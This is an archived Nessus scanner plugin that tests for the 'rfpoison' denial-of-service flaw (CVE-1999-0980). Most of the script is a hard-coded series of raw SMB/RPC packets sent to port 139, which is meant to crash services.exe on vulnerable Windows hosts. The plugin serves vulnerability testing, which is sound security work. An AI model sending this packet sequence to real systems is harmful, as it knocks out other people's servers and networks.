home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / rfpoison.nasl < prev    next >
Text File  |  2005-01-14  |  7KB  |  133 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10204);
  10.  script_bugtraq_id(754);
  11.  script_version ("$Revision: 1.16 $");
  12.  script_cve_id("CVE-1999-0980");
  13.  name["english"] = "rfpoison";
  14.  name["francais"] = "rfpoison";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "It may be possible
  18. to make the remote server crash
  19. using the 'rfpoison' attack. 
  20.  
  21. An attacker may use this flaw to
  22. shut down this server, thus 
  23. preventing your network from
  24. working properly.
  25.  
  26.  
  27. Solution: See Microsoft Technet 
  28. http://support.microsoft.com/support/kb/articles/Q231/4/57.ASP
  29.  
  30. Risk factor : High";
  31.  
  32.  
  33.  desc["francais"] = "Il peut  s'avΘrer
  34. possible de faire planter la 
  35. machine distante en utilisant
  36. l'attaque 'rfpoison'. 
  37.  
  38. Un pirate peut utiliser cette
  39. attaque pour empecher votre
  40. rΘseau de fonctionner normallement.
  41.  
  42. Solution : Cf http://support.microsoft.com/support/kb/articles/Q231/4/57.ASP
  43.  
  44. Facteur de risque : ElevΘ";
  45.  
  46.  script_description(english:desc["english"], francais:desc["francais"]);
  47.  
  48.  summary["english"] = "Crashes the remote host using the 'rfpoison' attack";
  49.  summary["francais"] = "Plante le serveur distant en utilisant l'attaque 'rfpoison'";
  50.  script_summary(english:summary["english"], francais:summary["francais"]);
  51.  
  52.  script_category(ACT_DENIAL);
  53.  
  54.  
  55.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  56.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  57.  family["english"] = "Denial of Service";
  58.  family["francais"] = "DΘni de service";
  59.  script_family(english:family["english"], francais:family["francais"]);
  60.  
  61.  script_require_ports(139);
  62.  exit(0);
  63. }
  64.  
  65. #
  66. # The script code starts here
  67. #
  68.  
  69. version = get_kb_item("SMB/WindowsVersion");
  70. if( version )
  71. {
  72.  if(ereg(pattern:"[5-9]\.*", string:version))exit(0);
  73. }
  74.  
  75.  
  76. if(get_port_state(139))
  77. {
  78.  soc = open_sock_tcp(139);
  79.  if(soc)
  80.  {
  81.  
  82. #
  83. # This is the result of rfp's secret program. I don't pretend
  84. # I understand it, but it works.
  85. #
  86.  
  87. data = raw_string(0x81,0x0,0x0,0x48,0x20,0x43,0x4b,0x46,0x44,0x45,0x4e,0x45,0x43,0x46,0x44,0x45,0x46,0x46,0x43,0x46,0x47,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x0,0x20,0x45,0x48,0x45,0x42,0x46,0x45,0x45,0x46,0x45,0x4c,0x45,0x46,0x45,0x46,0x46,0x41,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x0,0x0,0x0,0x0,0x0);
  88.             
  89. send(socket:soc, data:data);
  90. recv(socket:soc, length:1024);
  91.  
  92. data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x72,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0x0,0x81,0x0,0x2,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x31,0x2e,0x30,0x33,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,0x2e,0x30,0x0,0x2,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x0,0x2,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x0,0x2,0x53,0x61,0x6d,0x62,0x61,0x0,0x2,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x0,0x2,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x0);
  93.  
  94. send(socket:soc, data:data);
  95. recv(socket:soc, length:1024);
  96.  
  97. data = raw_string(0x0,0x0,0x0,0x54,0xff,0x53,0x4d,0x42,0x73,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0xd,0xff,0x0,0x0,0x0,0xff,0xff,0x2,0x0,0xf4,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x17,0x0,0x0,0x0,0x57,0x4f,0x52,0x4b,0x47,0x52,0x4f,0x55,0x50,0x0,0x55,0x6e,0x69,0x78,0x0,0x53,0x61,0x6d,0x62,0x61,0x0);
  98.  
  99. send(socket:soc, data:data);
  100. recv(socket:soc, length:1024);
  101.  
  102. data = raw_string(0x0,0x0,0x0,0x42,0xff,0x53,0x4d,0x42,0x75,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x8,0x1,0x0,0x4,0xff,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x17,0x0,0x0,0x5c,0x5c,0x2a,0x53,0x4d,0x42,0x53,0x45,0x52,0x56,0x45,0x52,0x5c,0x49,0x50,0x43,0x24,0x0,0x49,0x50,0x43,0x0);
  103.  
  104. send(socket:soc, data:data);
  105. recv(socket:soc, length:1024);
  106.  
  107. data = raw_string(0x0,0x0,0x0,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x18,0xff,0x0,0x0,0x0,0x0,0x7,0x0,0x6,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x9f,0x1,0x2,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x3,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x0,0x8,0x0,0x5c,0x73,0x72,0x76,0x73,0x76,0x63,0x0);
  108.  
  109. send(socket:soc, data:data);
  110. recv(socket:soc, length:1024);
  111.  
  112. data = raw_string(0x0,0x0,0x0,0x94,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x48,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x48,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x51,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0xb,0x0,0x10,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x30,0x16,0x30,0x16,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0xc8,0x4f,0x32,0x4b,0x70,0x16,0xd3,0x1,0x12,0x78,0x5a,0x47,0xbf,0x6e,0xe1,0x88,0x3,0x0,0x0,0x0,0x4,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x8,0x0,0x2b,0x10,0x48,0x60,0x2,0x0,0x0,0x0);
  113.  
  114. send(socket:soc, data:data);
  115. recv(socket:soc, length:1024);
  116.  
  117. data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x58,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x58,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x61,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0x0,0x3,0x10,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0xf,0x0,0x1,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x5c,0x0,0x5c,0x0,0x2a,0x0,0x53,0x0,0x4d,0x0,0x42,0x0,0x53,0x0,0x45,0x0,0x52,0x0,0x56,0x0,0x45,0x0,0x52,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0);
  118.  
  119. send(socket:soc, data:data);
  120. recv(socket:soc, length:1024);
  121.  
  122. msg = "A 'rfpoison' packet has been sent to the remote host.
  123. This packet is supposed to crash the 'services.exe' process,
  124. rendering the system instable.
  125. If you see that this attack was successful, have a look
  126. at this page : 
  127.    http://support.microsoft.com/support/kb/articles/Q231/4/57.ASP";
  128.  
  129. security_warning(port:139, data:msg);
  130. close(soc);
  131.  }
  132. }            
  133.